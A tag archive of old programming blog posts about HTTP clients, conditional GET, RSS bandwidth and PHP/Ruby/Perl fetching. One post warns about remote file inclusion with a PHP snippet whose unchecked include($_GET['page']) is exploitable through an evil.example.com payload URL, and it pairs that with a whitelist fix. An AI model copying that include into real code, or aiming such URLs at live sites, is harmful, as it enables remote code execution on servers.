Blog posts tagged "http"

WOE “GeoPlanet”: HTTP/1.1 406 Not Acceptable

November 19th, 2008


Just putting a note here for the next time I’m working with the Yahoo! GeoPlanet APIs.

The conundrum: an HTTP GET on a given resource (http://where.yahooapis.com/v1/place/23511846?appid=$appid) works in the browser, and works with wget from the command line, but fails from within PHP with a 406 Not Acceptable.

The solution: append format=XML to the resource URL, because the service is blowing out its brains on a missing Accept header.

And that, folks, is the magic of REST.
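
For the record, here’s roughly what the workaround looks like from PHP. This is a minimal sketch, not the code I was actually running: the appid value is a placeholder and it assumes allow_url_fopen is enabled.

<?php
// A sketch only: $appid is a placeholder for a real Yahoo! application id,
// and the WOEID is the one from the URL above.
$appid = 'YOUR_APP_ID';
$woeid = 23511846;

// Appending format=XML sidesteps the 406 that PHP's bare request
// (no Accept header) otherwise triggers.
$url = "http://where.yahooapis.com/v1/place/$woeid?appid=$appid&format=XML";

// Assumes allow_url_fopen is on; a stream context could instead be used
// to send an explicit Accept: header and skip the format parameter.
$xml = file_get_contents($url);
if ($xml === false) {
    die("GeoPlanet request failed\n");
}
echo $xml;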

update 2008/12/04: quick scan of my referer logs suggests this is biting folks using lwp-simple and wget particularly hard.

Ruby, HTTP, and open-uri

April 12th, 2005

Ruby’s obvious HTTP client library is Net::HTTP (‘net/http’); however, it feels a little bit awkward to use and lacks nice features like following redirects. If you’re coming from LWP you’ll be disappointed.

However there is a nice wrapper, open-uri, that makes it simple to add custom headers, provides loop-aware redirect following, etc. And it provides a super slick drop-in replacement for the Kernel#open method, so that you can open either a local file or a remote URL….

Danger Will Robinson! Danger

At this point, alarm bells are going off in the heads of the PHP programmers in the audience, who are thinking to themselves,

“Wow, someone went to the trouble of making Ruby act PHP-like! Down to replicating one of the most commonly exploited security holes!”

Sincerest forms of flattery aside, that seems like a really bad idea. Admittedly you have to explicitly require 'open-uri' in order to activate the feature, however, as the best of the Ruby HTTP clients (I’ve found to date) that seems like a decent bet in many web apps, and once you’ve done that all future calls to open can be hijacked to download remote files.
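
For the PHP programmers nodding along, the hole in question looks roughly like this. A sketch only: the page parameter and file layout are hypothetical, and the danger assumes allow_url_fopen is enabled.

<?php
// The classic hole alluded to above: because fopen()/include() transparently
// accept URLs when allow_url_fopen is enabled, an unchecked parameter becomes
// a remote code inclusion vector. ($_GET['page'] is a hypothetical parameter.)
$page = $_GET['page'];

// Vulnerable: ?page=http://evil.example.com/payload pulls in and executes
// an attacker's code.
include($page . '.php');

// The usual fix is to whitelist what may be included, and include it locally:
// $allowed = array('home', 'about', 'contact');
// if (in_array($page, $allowed, true)) {
//     include(dirname(__FILE__) . "/pages/$page.php");
// }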

Now, this being Ruby, there is probably some clever solution involving de-aliasing the open method which makes all these problems go away. Still, this seems like an opportunity for the PHP community, with its near-infinite experience with having web apps exploited, to teach the Ruby community something. Overloading your core file open semantic to transparently open remote resources is a bad idea, full stop.

Tagged: Uncategorized

RSS Bandwidth Strategies

December 21st, 2004

Much concern, hand-wringing, and advice on RSS bandwidth issues lately (see Regular Sucking Schedule, and HowTo RSS Feed State). Here’s some more.

skipHours (and co.), ttl, and mod_syndication are all considered harmful. They’re all underspecified, highly ambiguous, poorly supported, poorly implemented, and move logic into the file which should be (and is) in the protocol. Rule of thumb: if your bandwidth-saving mechanism is in your feed, it’s a mistake. They promise false hopes of salvation; ignore them.

HTTP Will Save You

Rather look to:
  • Conditional GET: learn it, live it, love it. Trivial to support, you have my permission to ban clients which don’t support it. (A rough server-side sketch follows this list.)
  • GZIP encoding: the obvious solution to bandwidth concerns is to swap a little CPU (and the magic of HTTP caching really does minimize it) for a whole lot of bandwidth savings. Been looking for a reason to upgrade to Apache 2.0? How about: mod_deflate is included by default and is more stable than the arcane (and nomadic) mod_gzip (which was a beacon in the darkness in its day).
  • RFC 3229, aka HTTP deltas, and mod_speedyfeed (reason #2 for upgrading to Apache 2.0). Wave of the future, next puncture in the equilibrium; Sam has some notes: Vary: ETag, Syndication with RFC3229, RFC3229 enabled, mod_speedyfeed.
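
To make the “it belongs in the protocol” point concrete, here’s a rough sketch of what honoring conditional GET looks like on the serving side, in PHP. The feed path and ETag scheme are placeholders, and the validator comparison is deliberately naive.

<?php
// Serve a feed with conditional GET support -- a sketch, not production code.
$feed  = '/path/to/feed.xml';                 // placeholder path
$mtime = filemtime($feed);
$etag  = '"' . md5($feed . $mtime) . '"';     // any stable validator will do
$last_modified = gmdate('D, d M Y H:i:s', $mtime) . ' GMT';

$if_none_match     = isset($_SERVER['HTTP_IF_NONE_MATCH'])
                   ? $_SERVER['HTTP_IF_NONE_MATCH'] : null;
$if_modified_since = isset($_SERVER['HTTP_IF_MODIFIED_SINCE'])
                   ? $_SERVER['HTTP_IF_MODIFIED_SINCE'] : null;

// Always advertise the validators so clients can play along next time.
header("ETag: $etag");
header("Last-Modified: $last_modified");

// If the client's copy is still current, send 304 and no body at all.
if ($if_none_match === $etag || $if_modified_since === $last_modified) {
    header('HTTP/1.1 304 Not Modified');
    exit;
}

header('Content-Type: application/rss+xml');
readfile($feed);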

It’s All About Apache2 and HTTP/1.1

This post also does double duty as my weighing in on the Apache2 vs. PHP mini-controversy.

Fat Media

Obviously none of this will save you from the bandwidth concern of podcasting (or videoblogging!). I’m willing to concede that those concerns are beyond the scope of basic HTTP, and point your attention to BitTorrent.

Tagged: Uncategorized

Like Rsync for HTTP

December 8th, 2003

RFC 3229 (HTTP deltas via steve) needs a “for Hackers” article in the style of the classic Conditional GET for RSS Hackers.

Tagged: Uncategorized

Aggregators and Prior Art

July 22nd, 2003

Mark reminds us aggregators are HTTP clients, and there’s a lot of prior art on how HTTP clients are supposed to work.

I struggle with how much of this Magpie should be aware of. It’s not really an aggregator, but people use it as such. The response code (and, in CVS, the full headers) is made available to clients, but for the people using it as a simple drop-in to their website, Magpie moves from being a library to being the client.

A difficult balance, too complicated for my exhausted brain.

Tagged: Uncategorized

Conditional GET with LWP & Perl

March 1st, 2003

I was arguing recently that implementing a conditional GET with LWP is trivial and there was no reason why someone wouldn’t support it. I assumed there must be a dozen examples of how to do this. After all, O’Reilly has “open sourced” their original LWP book, there is an LWP cookbook, and reams of POD.

No Such Luck

Well, a quick search didn’t turn up anything. A more concerted one might have, but it was easier to write this example than to keep searching. If you’re looking for more general info on conditional GETs, try Charles Miller’s HTTP Conditional Get for RSS Hackers. If you’re looking for an implementation in PHP, you might look at rss_fetch in my RSS parser/aggregator Magpie.

Conditional GET

The basic idea is: when you request a file you remember the ETag and Last-Modified HTTP headers, passing them along with your next request as If-None-Match and If-Modified-Since. If the file has changed you’ll get the content as normal; if the file hasn’t changed you’ll get a ‘304 Not Modified’ response.

This is something of a toy example, but I try to be as correct as possible with it. Notable in its absence is doing anything with the file you’ve fetched (for example, parsing and storing an RSS feed). Also, I use a simple file to store the ETag and Last-Modified; you might want to use a different backend.

Example Code


use LWP::UserAgent;
use HTTP::Request;

my $url = "http://localhost/rss/laughingmeme.rdf";
my $cache_file = 'cache';
my %headers;

if ( -e $cache_file ) {
    open (CACHE, "< $cache_file") or die "Couldn't open: $!";
    # read back the validators saved from the last fetch, one per line
    my $etag          = <CACHE>;
    my $last_modified = <CACHE>;
    close CACHE;
    chomp($etag, $last_modified);
    %headers = (
        If_None_Match     => $etag,
        If_Modified_Since => $last_modified,
    );
}

my $ua = LWP::UserAgent->new();
$ua->agent("Conditionally Enabled v0.1");

my $req = HTTP::Request->new( GET => $url );
$req->header(%headers);

my $res = $ua->request($req);
if ($res->is_success) {
    print "new!\n";
    # save ETag & Last-Modified
    open (CACHE, "> $cache_file") or die "Couldn't open: $!";
    print CACHE $res->header('ETag'), "\n";
    print CACHE $res->header('Last-Modified'), "\n";
    close CACHE;
}
elsif ( $res->code() eq '304' ) {
    print "not modified, go to cache\n";
    # do logic for RSS not modified
}
else {
    print "fooey! somthing went wrong\n";
}

Tagged: Uncategorized

There Has Got To Be A Better Way

October 23rd, 2002

So I’ve got this nifty little RSS parser doohickey, Magpie. In the name of lowering the curve, and weaning PHP programmers away from their previously available hackish solutions, I tried to make it as simple to use, and as “PHP-like”, as possible. Meaning that fetching the remote feed, parsing it, and caching it have been rolled into one convenient step. Now that HTTP conditional GETs are all the rage, I’m adding them to Magpie. (I’ve had an ugly implementation lying around for a while, but it’s not even worth checking into CVS.)

PHP as Web Client

But how the hell does one do web automation with PHP? I feel like no one has ever taken this problem on before in PHP. Or at least no one on the web is talking about it somewhere I can find it. How does one get at If-Modified-Since, Last-Modified, and ETag? Where is LWP or urllib2 for PHP?

You can get at the response headers from fopen() via the array $http_response_header, which is magically instantiated behind the scenes (because PHP does that kind of thing). I wonder, if I stuffed some values into an array named $http_request_header, would it work? (No, it doesn’t.)
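
For what it’s worth, a minimal sketch of the half that does work: reading the response headers PHP hands you after an HTTP fopen()/file_get_contents(). The feed URL is a placeholder, and the stream-context trick for sending request headers belongs to PHP releases newer than the one I’m wrestling with here.

<?php
// After fetching over the http:// wrapper, PHP drops the raw response
// headers into the local variable $http_response_header.
$url = 'http://example.com/index.rdf';   // placeholder feed URL

$rss = file_get_contents($url);

foreach ($http_response_header as $header) {
    // Pick out the validators worth caching for a conditional GET next time.
    if (preg_match('/^(ETag|Last-Modified):/i', $header)) {
        echo $header, "\n";
    }
}

// Sending request headers (If-None-Match and friends) takes a stream context,
// a feature that arrived in PHP after this post was written.
$context = stream_context_create(array(
    'http' => array('header' => "If-None-Match: \"some-etag\"\r\n"),
));
$rss = file_get_contents($url, false, $context);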

PHP Cookbook

The PHP Cookbook has a tantalizing Chapter 11 entitled “Web Automation”, with recipe 11.1 being “Fetching URLs with GET” and recipe 11.4 “Fetching URLs with Headers”, sounding just about perfect. And it’s supposed to come out this November, which could only be 9 days away, but I’m impatient. I’m going to stop by Quantum today to see if they have one of their looks-like-someone-snuck-it-out-the-back-door-and-photocopied-it O’Reilly specials.

Rolling Your Own

So, barring deliverance from on high by O’Reilly, it appears that the only way I’m going to get these features right now is to roll my own using fsockopen() and hand-packed headers. Have I mentioned that PHP is sadly deficient in tools?

update, 10/25: So the word on the street is “just use sockets”; the answer rolls off the mailing lists and newsgroups with the polish and weariness of a frequently asked question. No one suggested it, but I’m also intrigued by Snoopy, the web client class for PHP. I think I’ll start by rolling my own, and loop back to Snoopy when I have time to do benchmarks.

fyi: ended up using Snoopy, very happy with it.

The Impenetrable Importance of Culture

For me the hardest part of working with languages I’m less familiar with (Python and PHP, for example) rather than those I’m more comfortable with (Perl or Java) is not syntax questions, it’s culture. For all of Perl’s much-vaunted “There Is More Than One Way To Do It”, I know the proper way to do things, the proper tool to reach for, and if I don’t I have ways of finding out, largely through internal calculation based on my understanding of the Perl reputation landscape. It is that information which is opaque to me, especially in PHP, where the vast number of practitioners are novices.

Tagged: Uncategorized